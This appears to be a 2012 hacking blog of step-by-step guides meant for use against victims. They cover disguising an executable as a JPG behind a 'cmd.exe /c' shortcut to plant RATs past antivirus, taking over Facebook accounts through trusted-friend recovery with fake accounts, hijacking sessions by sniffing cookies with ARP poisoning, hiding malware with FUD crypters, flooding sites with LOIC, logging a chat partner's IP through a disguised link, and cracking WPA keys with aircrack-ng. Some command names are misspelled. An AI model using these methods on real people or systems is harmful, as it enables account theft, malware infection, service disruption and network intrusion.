Wednesday 5 September 2012

How to Hide .exe File into .jpg File

Hiding .exe File into .jpg File

In this tutorial i'll tell you how you can hide .exe (executable file of Windows) file  into a .jpg file without changing the file extension. After this tutorial you can easly hide any .exe file and no on can detect it even an antivirus. And you can bind any Rats server in it.
 
Hide EXE File into JPG


Lets Start and Follow These Steps:-
1. Create a new folder and check folder settings and set it to “Show hidden files” is checked and “hide extensions for known file types” is unchecked in folder options.

2. Make a copy of .exe file same folder for example called it "A.exe".

3. After this must rename A.exe file to any name whatever. Lets suppose you renamed it to B.jpg. While trying to rename a new windows will warn you  "if you really want to change this extension from exe to jpg" here you must be click on YES.

4. Next you will be create a shortcut for B.jpg in same folder and you will rename it shortcut to any name that you want lets assume you renamed it to C.exe.

5. After that Right click on C.exe and select "Properties". Here i am mentioning some following changes which you have to done.

6. Now Delete every thing which are show in start in field and you leaved it empty.

7. Here in this steps you has write a path to open other files B.jpg for expmle "C:\WINDOWS\system32\cmd.exe /c B.jpg"

8. Here in last field, c B.jpg are all time name of the first file. If you called the first file demo.avi then you have must write it  "C:\WINDOWS\system32\cmd.exe /c demo.avi"

9. What is next now and what you will get when some person will be clicked on C.jpg, a predefined command will  be execute on other file B.jpg and the hidden source will be running on hidden side.

10. After that right click on C.jpg, Select properties and after that you can see one option that can change your icon. Click on that and a new window will be open. Here you will be write the following code (copy and paste)  " %SystemRoot%\system32\SHELL32.dll " After copying/writing this code Press Ok

Congrats complete steps you have done but you must remember two thing in your minds that is these 2 files should be together in same space/folder and to stay connected to any one they must click on the shortcut created not on the first file. Soo renamed files to wherever you want considering the person.
.
www.facebook.com/e3CyberAcademy





!_Cra5h3R_!

Monday 3 September 2012

How to Hack Facebook using 3 Trusted Friend Method in 10 Steps

Facebook Hack 3 Trusted Method in Just 10 Steps

There so are many techniques of hacking for Facebook Password including Phishing, Key logger, Social Engineering and other social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery.

In  this if your password and you don’t have any access of your default email address than this feature will recover it by sending 3 friends recover message and in result you can access your account password again.
Note: For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

Lets Start Hacking :)

1. First you have to go on www.facebook.com and click Forgot your password?

Step 1

2. Search for your friend’s Here you can search your victims id's or username.

Step 2

3. After searching it will give you some list of id's. You confirm your victim and you will be promoted to the following page. Now Click This is My Account.

Step 3

4. Now It shows recovery email and Mobile Contact Nuumbers. Confirm your victim and you both are promoted to the following page. Now Click "No longer have access to these?"


Step 4

5. Again page will be open that will ask you ‘ How can we reach you?‘ In the text box you enter any fake/rubbish email id then click on Submit.

Step 5

6. After clicking on submit button you will redirect to Answer Your Security Question Page. Here Facebook can allow to input answers of these questions only three times. Here you can type anything and click on submit. but if your answer is wrong facebook will be asked to input the correct answer. Follow same again input slack/rubbish/random and click on submit button.

Step 6


7. Now here you have crossed 3 time, and Facebook will promote to you on following page.

Step 7

8. It is latest Facebook recovery feature. Just click Continue Button and select Friend To Asist You Page. Here you can select the one friends you know and can reach them through phone. Click one continue button. Same as you can select all three friends by clicking on continue button.

Step 8

9. When you select all three friends, you will enter to the following page. Here click on ‘ Send Codes To Friends’.

Step 9

10. When you will click one the button. codes would be sent to the selected friends through SMS. Later you could contact them and get the codes, input and thus you could change the account password and gain control.
You all will be thinking that friends will spread the news that you have hacked your friends account because they knew the codes. No, you could make fake 3 facebook account send friend request to the victim and while selecting the Friends in the ‘ Select Friends To Asist’ you can choose your fake accounts. You will recieve the sms, input the codes and thus hacked.
 .
www.facebook.com/e3CyberAcademy





!_Cra5h3R_!

How to Hack Facebook Using Wireshark

Facebook Hack Using Wireshark

  • Before start this setp by step guid to Hack Facebook account you all have knowledge about Wireshark.
  • It will also work on LAN with switch but you'll have to perform ARP poisoning. Here surely I 'll not discus how to use Wireshark. Please read tutorials to know how to use wireshark.
  • First of all I must clear you even though you'll get access to victim's account you'll not get his/her password, this trick will work only on LAN and your victim must be directly connected with this LAN.

Lets Start
In this tutorial we will have out look on how you can hack Facebook account using wireshark.

1. For this hack you'll need wireshark which is a packet sniffing tool.
Packet Sniffing
2. Mozilla Firefox web browser and add n edit add-on for Mozilla Firefox.

3. Now I assume you have all above components for hacking facebook and you are connected in a hub based LAN or LAN which has been ARP poisoned.

4. Now click on capture button and start capturing packets. Now using command line shell ping www.facebook.com to get its IP address, filter all IP packets having IP address of  www.facebook.com and search for HTTP protocol followed by GET /home.php, this may vary depending on region and time/zone but don't bother try to search all packets with HTTP GET for cookies.

5. Now from packet details window expand the packet information for above packet and you'll get 8-10 different cookies that are stored by www.facebook.com on victim's PC.

6. Right click and copy all cookies names and values in notepad.

Copy Cookies
7. Now open Mozilla Firefox browse to tools and open Cookie editor. Add each cookie to your cookie folder using Cookie editor.
Cookie Editor
8. After adding each value, your cookie editor will show you following values in cookie list for facebook.


9. Now DONE!!! Close Cookie editor and open Facebook, you'll find yourself logged into the victims account.

Defense Against This Attack:

A system administrator should use tools used for countering sniffing.
Don't log-in into your accounts if you know your LAN is not protected and if you want to log-in better use a tunneled connection

Download Wireshark Form: http://www.wireshark.org/
Download Add N Edit Cookies From: Add-On Mozilla
  .

www.facebook.com/e3CyberAcademy





!_Cra5h3R_!

Saturday 1 September 2012

How to Use FUD Crypter ?

How to Use FUD Crypter ???


What Is FUD Crypter?
FUD is acronym for fully undetectable.It is a software that can be used to encrypt your exe files.

What is the use of FUD Crypter?
FUD crypters can be used to encrypt viruses,RAT,keyloggers,spywares etc to make them undetectable from antiviruses.When these exe files are encrypted with Fud crypters they become undetectable with antiviruses

FUD Crypter
  How Does FUD Crypter Work?
The Basic Working Of FUD Crypter is explained below
The Crypter takes the original binary file of you exe and applies many encryption on it and stores on the end of file(EOF).So a new crypted executable file is created.
Original Exe Crypted Exe
001————- 010 101————-110
100|Original File|000-> Cryptor ->010|Original File|110
010————- 111 110————-010

The new exe is not detected by antiviruses because its code is scrambled by the crypter.When executed the new .exe file decrypts the binary file into small the data small pieces at a time and injects them into another already existing process or a new empty one, OR it drops the code into multiple chunks in alternative data streams(not scanned by most a/v) then executes it as a .txt or .mp3 file.

Why Most FUD Crypters Donot Work?
As a FUD crypter becomes popular it also get the eyes of antivirus companies.The antivirus companies update their software and employ detection mechanism that detect the encryption’s by the crypter.So, most of the popular FUD crypter are easily detected by antiviruses.

Download Link FUD Cryper: 
Download FUD Crypter
Password: Cra5h3R
.
www.facebook.com/e3CyberAcademy





!_Cra5h3R _!

Wednesday 29 August 2012

How to DDoS / POD Attack

DDoS / POD Attack

In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) or PoD (Ping of Death) is an attempt to make a machine or network resource unavailable to its intended users. Although the means to carry out, motives for, and targets of a DoS/POD attack may vary, A ping is normally 32 bytes in size (or 84 bytes when the Internet Protocol [IP] header is considered).
Many computer systems could not handle a ping packet larger than the maximum IPv4 packet size, which is 65,535 bytes. Sending a ping of this size could crash the target computer.
These attacks are generally consists of the efforts of one or more people to temporarily or indefinitely interrupt or suspend services of a host connected to the Internet with high bandwidth. The more people you are the more chances to get down any Site, router, switch or any network device.
A Simple Understanding of DOS Attack

Get Started :-
  1. Download LOIC (Find Free link in bottom)
  2. After Successful Download Run LOIC.exe
  3. XX.XX.XX.XX -> Enter this IP Address or Site Name and Press LOCK ON
  4. Choose HTTP and Press on the Big Button at the TOP
NOTE : If Your LOIC doesnt Work Please Upgrade to the Latest version Of the .net Framework ( .net 4) And Always download from Microsoft's Site

Download Link of LOIC :- http://www.mediafire.com/?yngoo4gcbokqixy
Password: Cra5h3r
.
www.facebeeok.com/e3CyberAcademy





!_Cra5h3R_!

How to Find IP Address of Victim

How to Find the IP Address of a Remote Computer

Most of you may be curious to know how to find the IP address of your friend’s computer or to find the IP address of the person with whom you are chatting in Yahoo messenger, GTalk, Facebook or any other IM.
In this post I’ll show you how to find the IP address of a remote computer in simple steps.
For this purpose i created a PHP script to make it easier for you to find the IP address of the remote computer of your choice. Here is a step-by-step process to find out the IP address.

Lets Start :-
1. Download the IP Finder script (IP_Finder.ZIP) that I have created.
2. Open a new account (any free host that supports PHP).
3. Extract the IP_Finder.ZIP file (Link is available in bottom) and upload the two files ip.php and ip_log.txt into the root folder of your hosting account using the File Manager.
4. You can rename the ip.php to any name of your choice.
5. Set the permission to 777 on ip_log.txt.

  • Now you are all set to find the IP address of your friend or any remote computer of your choice.
  • All you have to do is send the link of ip.php to your friend or the person with whom you’re chatting. Once the person click’s on the link, his/her IP address is recorded in the file ip_log.txt.
  • In simple words i can explain Suppose you open a new account in xyz.com with the subdomain as abc, then your IP Finder link would be like this http://abc.xyz.com/ip.php
  • You have to send the above link to you friend via email or while chatting and ask him to visit that link. Once your friend clicks on the link, his IP address will be recorded along with the Date and Time in the ip_log.txt file. After recording the IP address, the script will redirect the person to google.com so as to avoid any suspicion.
  • To find the recorded IP address check the logs using the following link.
  • http://abc.xyz.com/ip_log.php
I hope this script will work for You, if u face any problem you can ask us.
File Download Link of IP_Finder.Zip:
http://www.mediafire.com/?9pxsrfdn9b1btmd
.
www.facebook.com/e3CyberAcademy





!_Cra5H3R_!

How to Crack WiFi WPA/WPA2 Key

How to Crack WiFi WPA/WPA2 Key

In this tutorial i'll explain how to crack Wifi WPA/WPA2 key using Backtrack. This is step by step tutorial of cracking any wifi key. if face any problem during this process, u can share here your problem.
Before u start u need a Worldlist, which i pre installed in Backtrack. If it is not available u can ezly download from Google.

Lets Start :-
1. #airmon-ng
2. # airmon-ng start wlan0 *(wlan0 is your wireless network interface)
3. ifconfig mon0 down
4. macchanger -m 00:11:22:33:44:55 mon0
5. ifconfig mon0 up
6. airdump-ng mon0
7. airedump-ng -c 1 -w WapCrack --bssid xx:xx:xx:xx:xx:xx --ivs mon0
*(1=channel, WapCrack=file name, xx:xx:xx:xx:xx:xx= Victim's MAC
8. airoplay-ng -0 1 -e DE1E mon0
*(DE1E = ESSID)
9. aircrack-ng -w /root/Desktop/Worldlist.lst WapCrack.ivs

Now sit back and just wait, may b it take 1 hour to found key. After found key it shows:
Key Found : [ KEY_HERE]
Enter key and enjoy :)


www.facebook.com/e3CyberAcademy
www.facebook.com/e3CyberAcademy





!_Cra5h3R_!